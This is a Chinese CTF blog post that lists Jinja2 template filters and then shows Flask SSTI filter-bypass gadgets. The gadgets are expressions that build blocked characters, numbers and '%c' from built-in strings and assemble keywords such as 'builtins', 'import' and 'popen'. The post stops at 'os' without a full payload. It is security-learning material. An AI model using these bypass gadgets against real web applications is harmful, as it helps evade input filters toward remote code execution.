<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Sl0th">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://sloth31.github.io/2023/01/16/jinjia2-过滤器/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="jinjia2  过滤器奇安信攻防社区-flask SSTI学习与总结 (butian.net)  flask 过滤器flask过滤器和其它语言的过滤器作用几乎一致，对数据进行过滤 使用 123变量|过滤器variable|filter(args)    variable|filter        &#x2F;&#x2F;如果过滤器没有参数可以不加括号  常用过滤器**int()**：将值转换为int类型； **f">
<meta property="og:type" content="article">
<meta property="og:title" content="jinjia2 过滤器">
<meta property="og:url" content="http://sloth31.github.io/2023/01/16/jinjia2-%E8%BF%87%E6%BB%A4%E5%99%A8/index.html">
<meta property="og:site_name" content="Sl0th&#39;s Blog">
<meta property="og:description" content="jinjia2  过滤器奇安信攻防社区-flask SSTI学习与总结 (butian.net)  flask 过滤器flask过滤器和其它语言的过滤器作用几乎一致，对数据进行过滤 使用 123变量|过滤器variable|filter(args)    variable|filter        &#x2F;&#x2F;如果过滤器没有参数可以不加括号  常用过滤器**int()**：将值转换为int类型； **f">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-01-16T14:57:46.000Z">
<meta property="article:modified_time" content="2024-07-03T14:58:38.468Z">
<meta property="article:author" content="Sl0th">
<meta property="article:tag" content="web">
<meta property="article:tag" content="ssti">
<meta property="article:tag" content="python">
<meta name="twitter:card" content="summary">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/img/fav.ico" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/img/fav.ico">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/img/fav.ico">
    <!--- Page Info-->
    
    <title>
        
            jinjia2 过滤器 | Sl0th&#39;s Blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"sloth31.github.io","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":true,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/img/night.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/img/day.jpg","dark":"/img/night.jpg"},"title":"👋Welcome to Sl0th's Blog🎉","subtitle":{"text":["There is no royal road to learning"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":50,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#4D5356","dark":"#fff"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":"enable","style":"default","links":{"github":"https://github.com/sloth31","instagram":null,"zhihu":null,"twitter":null,"email":"z694081360@gmail.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.7.3","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Github":"https://github.com/sloth31","Blog":"http://sl0th.top/"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"}}},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



<main class="page-container" id="swup">

    

    <div class="main-content-container flex flex-col justify-between min-h-dvh">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
                <a class="logo-image h-8 w-8 sm:w-10 sm:h-10 mr-3" href="/">
                    <img src="/img/fav.ico" class="w-full h-full rounded-sm">
                </a>
            
            <a class="logo-title" href="/">
                
                Sl0th&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    归档
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    标签
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/categories"
                                        >
                                    <i class="fa-regular fa-folder fa-fw"></i>
                                    分类
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    关于
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://github.com/sloth31">
                                                    GITHUB
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="http://sl0th.top/">
                                                    BLOG
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                归档
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                标签
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/categories"
                        >
                            <span>
                                分类
                            </span>
                            
                                <i class="fa-regular fa-folder fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                关于
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://github.com/sloth31">GITHUB</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="http://sl0th.top/">BLOG</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
                
                    
                    
                    
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">27</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">10</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">44</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">jinjia2 过滤器</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/img/avatar.JPG">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">Sl0th</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-01-16 22:57:46</span>
        <span class="mobile">2023-01-16 22:57:46</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-07-03 22:58:38</span>
            <span class="mobile">2024-07-03 22:58:38</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/ctf/">ctf</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/web/">web</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/ssti/">ssti</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/python/">python</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="jinjia2-过滤器"><a href="#jinjia2-过滤器" class="headerlink" title="jinjia2  过滤器"></a>jinjia2  过滤器</h1><p><a class="link"   target="_blank" rel="noopener" href="https://forum.butian.net/share/1371" >奇安信攻防社区-flask SSTI学习与总结 (butian.net) <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="flask-过滤器"><a href="#flask-过滤器" class="headerlink" title="flask 过滤器"></a>flask 过滤器</h2><p>flask过滤器和其它语言的过滤器作用几乎一致，对数据进行过滤</p>
<p>使用</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">变量|过滤器</span><br><span class="line">variable|<span class="built_in">filter</span>(args)    </span><br><span class="line">variable|<span class="built_in">filter</span>        //如果过滤器没有参数可以不加括号</span><br></pre></td></tr></table></figure></div>

<h3 id="常用过滤器"><a href="#常用过滤器" class="headerlink" title="常用过滤器"></a>常用过滤器</h3><p>**<code>int()</code>**：将值转换为int类型；</p>
<p>**<code>float()</code>**：将值转换为float类型；</p>
<p>**<code>lower()</code>**：将字符串转换为小写；</p>
<p>**<code>upper()</code>**：将字符串转换为大写；</p>
<p><code>min()</code>:求序列中最小值</p>
<p>**<code>title()</code>**：把值中的每个单词的首字母都转成大写；</p>
<p>**<code>capitalize()</code>**：把变量值的首字母转成大写，其余字母转小写；</p>
<p>**<code>trim()</code>**：截取字符串前面和后面的空白字符；</p>
<p>**<code>wordcount()</code>**：计算一个长字符串中单词的个数；</p>
<p>**<code>reverse()</code>**：字符串反转；</p>
<p>**<code>replace(value,old,new)</code>**： 替换将old替换为new的字符串；</p>
<p>**<code>truncate(value,length=255,killwords=False)</code>**：截取length长度的字符串；</p>
<p>**<code>striptags()</code>**：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；</p>
<p>**<code>escape()</code>或<code>e</code>**：转义字符，会将<code>&lt;</code>、<code>&gt;</code>等符号转义成<code>HTML</code>中的符号。显例：<code>content|escape</code>或<code>content|e</code>。</p>
<p>**<code>safe()</code>**： 禁用<code>HTML</code>转义，如果开启了全局转义，那么<code>safe</code>过滤器会将变量关掉转义。示例：<code> &#123;&#123;'<em>hello</em>'|safe&#125;&#125;</code>；</p>
<p>**<code>list()</code>**：将变量列成列表；</p>
<p>**<code>string()</code>**：将变量转换成字符串；</p>
<p>**<code>join()</code>**：将一个序列中的参数值拼接成字符串。示例看上面<code>payload</code>；</p>
<p>**<code>abs()</code>**：返回一个数值的绝对值；</p>
<p>**<code>first()</code>**：返回一个序列的第一个元素；</p>
<p>**<code>last()</code>**：返回一个序列的最后一个元素；</p>
<p>**<code>format(value,arags,\*kwargs)</code>**：格式化字符串。比如：<code>&#123;&#123; "%s" - "%s"|format('Hello?',"Foo!") &#125;&#125;将输出：Helloo? - Foo!</code></p>
<p>**<code>length()</code>**：返回一个序列或者字典的长度；</p>
<p>**<code>sum()</code>**：返回列表内数值的和；</p>
<p>**<code>sort()</code>**：返回排序后的列表；</p>
<p>**<code>default(value,default_value,boolean=false)</code>**：如果当前变量没有值，则会使用参数中的值来代替。示例：<code>name|default(&#39;xiaotuo&#39;)</code>—-如果name不存在，则会使用<code>xiaotuo</code>来替代。<code>boolean=False</code>默认是在只有这个变量为<code>undefined</code>的时候才会使用<code>default</code>中的值，如果想使用<code>python</code>的形式判断是否为<code>false</code>，则可以传递<code>boolean=true</code>。也可以使用<code>or</code>来替换。</p>
<h2 id="基本思路"><a href="#基本思路" class="headerlink" title="基本思路"></a>基本思路</h2><h3 id="获取入口点"><a href="#获取入口点" class="headerlink" title="获取入口点"></a>获取入口点</h3><div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> org = (&#123; &#125;|select()|string()) %&#125;&#123;&#123;org&#125;&#125; </span><br><span class="line">&#123;% <span class="built_in">set</span> org = (<span class="variable language_">self</span>|string()) %&#125;&#123;&#123;org&#125;&#125; </span><br><span class="line">&#123;% <span class="built_in">set</span> org = <span class="variable language_">self</span>|string|urlencode %&#125;&#123;&#123;org&#125;&#125; </span><br><span class="line">&#123;% <span class="built_in">set</span> org = (app.__doc__|string) %&#125;&#123;&#123;org&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>这些基本都能得到一长串字符串，里面包含字母、尖号、下划线、数字等，可以通过增加下标来获取</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> org = (&#123; &#125;|select()|string()) %&#125;&#123;&#123;org&#125;&#125; </span><br><span class="line"><span class="comment"># &lt;generator object select_or_reject at 0x1047f7ac0&gt;</span></span><br><span class="line">&#123;% <span class="built_in">set</span> org = (&#123; &#125;|select()|string()) %&#125;&#123;&#123;org[<span class="number">1</span>]&#125;&#125;</span><br><span class="line"><span class="comment"># g</span></span><br></pre></td></tr></table></figure></div>
</blockquote>
<p>这个对应道字符串含有百分号，这样可以通过url编码得到所有字符</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> org = <span class="variable language_">self</span>|string|urlencode %&#125;&#123;&#123;org&#125;&#125;</span><br><span class="line"><span class="comment"># %3CTemplateReference%20None%3E</span></span><br></pre></td></tr></table></figure></div>

<p>这个包含了更多的字符种类</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> org = (app.__doc__|string) %&#125;&#123;&#123;org&#125;&#125;</span><br><span class="line"><span class="comment"># The default undefined type. This undefined type can be printed and iterated over, but every other access will raise an :exc:`UndefinedError`: &gt;&gt;&gt; foo = Undefined(name=&#x27;foo&#x27;) &gt;&gt;&gt; str(foo) &#x27;&#x27; &gt;&gt;&gt; not foo True &gt;&gt;&gt; foo + 42 Traceback (most recent call last): ... jinja2.exceptions.UndefinedError: &#x27;foo&#x27; is undefined </span></span><br></pre></td></tr></table></figure></div>

<p>对于获取数字，除了上面出现的那几种外我们还可以有以下几种方法：</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> num = (<span class="variable language_">self</span>|<span class="built_in">int</span>) %&#125;&#123;&#123;num&#125;&#125;    <span class="comment"># 0, 通过int过滤器获取数字</span></span><br><span class="line">&#123;% <span class="built_in">set</span> num = (<span class="variable language_">self</span>|string|length) %&#125;&#123;&#123;num&#125;&#125;    <span class="comment"># 24, 通过length过滤器获取数字</span></span><br></pre></td></tr></table></figure></div>

<h3 id="获取特定字符"><a href="#获取特定字符" class="headerlink" title="获取特定字符"></a>获取特定字符</h3><p>获取.</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> point = <span class="variable language_">self</span>|<span class="built_in">float</span>|string|<span class="built_in">min</span> %&#125;    <span class="comment"># 通过float过滤器获取点 .</span></span><br></pre></td></tr></table></figure></div>

<p>下划线</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> xhx = ((&#123; &#125;|select|string|<span class="built_in">list</span>).pop(<span class="number">24</span>)|string) %&#125;&#123;&#123;xhx&#125;&#125;  </span><br><span class="line">&#123;% <span class="built_in">set</span> xhx=&#123; &#125;|select|string %&#125;&#123;&#123;xhx[<span class="number">24</span>]&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>空格</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> space = ((&#123; &#125;|select|string|<span class="built_in">list</span>).pop(<span class="number">10</span>)|string) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> space = &#123; &#125;|select|string %&#125;&#123;&#123;space[<span class="number">10</span>]&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>左括号(                </p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> yin = ((app.__doc__|string|<span class="built_in">list</span>).pop(<span class="number">195</span>)|string) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> yin = app.__doc__|string %&#125;&#123;&#123;yin[<span class="number">195</span>]&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>右括号)</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> yin = ((app.__doc__|string|<span class="built_in">list</span>).pop(<span class="number">199</span>)|string) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> yin = app.__doc__|string %&#125;&#123;&#123;yin[<span class="number">199</span>]&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>单引号’</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> yin = ((app.__doc__|string|<span class="built_in">list</span>).pop(<span class="number">181</span>)|string) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> yin = app.__doc__|string %&#125;&#123;&#123;yin[<span class="number">181</span>]&#125;&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="c的利用"><a href="#c的利用" class="headerlink" title="%c的利用"></a>%c的利用</h3><p>常见数字</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> zero = ((&#123; &#125;|select|string|<span class="built_in">list</span>).pop(<span class="number">38</span>)|<span class="built_in">int</span>) %&#125;    <span class="comment"># 0</span></span><br><span class="line">&#123;% <span class="built_in">set</span> one = (zero**zero)|<span class="built_in">int</span> %&#125;    <span class="comment"># 1</span></span><br><span class="line">&#123;% <span class="built_in">set</span> two = (zero-one-one)|<span class="built_in">abs</span> %&#125;    <span class="comment"># 2</span></span><br><span class="line">&#123;% <span class="built_in">set</span> four = (two*two)|<span class="built_in">int</span> %&#125;    <span class="comment"># 4</span></span><br><span class="line">&#123;% <span class="built_in">set</span> five = (two*two*two)-one-one-one %&#125;    <span class="comment"># 5</span></span><br><span class="line">&#123;% <span class="built_in">set</span> seven = (zero-one-one-five)|<span class="built_in">abs</span> %&#125;    <span class="comment"># 7</span></span><br></pre></td></tr></table></figure></div>

<p>字符c</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> c = <span class="built_in">dict</span>(c=aa)|reverse|first %&#125;</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p><strong>dict()</strong> 函数用于创建一个字典,这里dict(c&#x3D;aa)是 {‘c’: Undefined}</p>
</blockquote>
<p>百分号</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> bfh = <span class="variable language_">self</span>|string|urlencode|first %&#125; </span><br></pre></td></tr></table></figure></div>

<p>%c </p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> bfhc=bfh~c %&#125; </span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>这里构造了%c, 之后可以利用这个%c构造任意字符。~用于字符连接</p>
</blockquote>
<p>使用%c构造斜杠 &#x2F;</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> slas = bfhc%((four~seven)|<span class="built_in">int</span>) %&#125; </span><br></pre></td></tr></table></figure></div>

<h3 id="常见字段"><a href="#常见字段" class="headerlink" title="常见字段"></a>常见字段</h3><p>builtins</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> but = <span class="built_in">dict</span>(buil=aa,tins=dd)|join %&#125;  </span><br></pre></td></tr></table></figure></div>

<p>import</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> imp = <span class="built_in">dict</span>(imp=aa,ort=dd)|join %&#125; </span><br></pre></td></tr></table></figure></div>

<p>popen</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> pon = <span class="built_in">dict</span>(po=aa,pen=dd)|join %&#125; </span><br></pre></td></tr></table></figure></div>

<p>os</p>
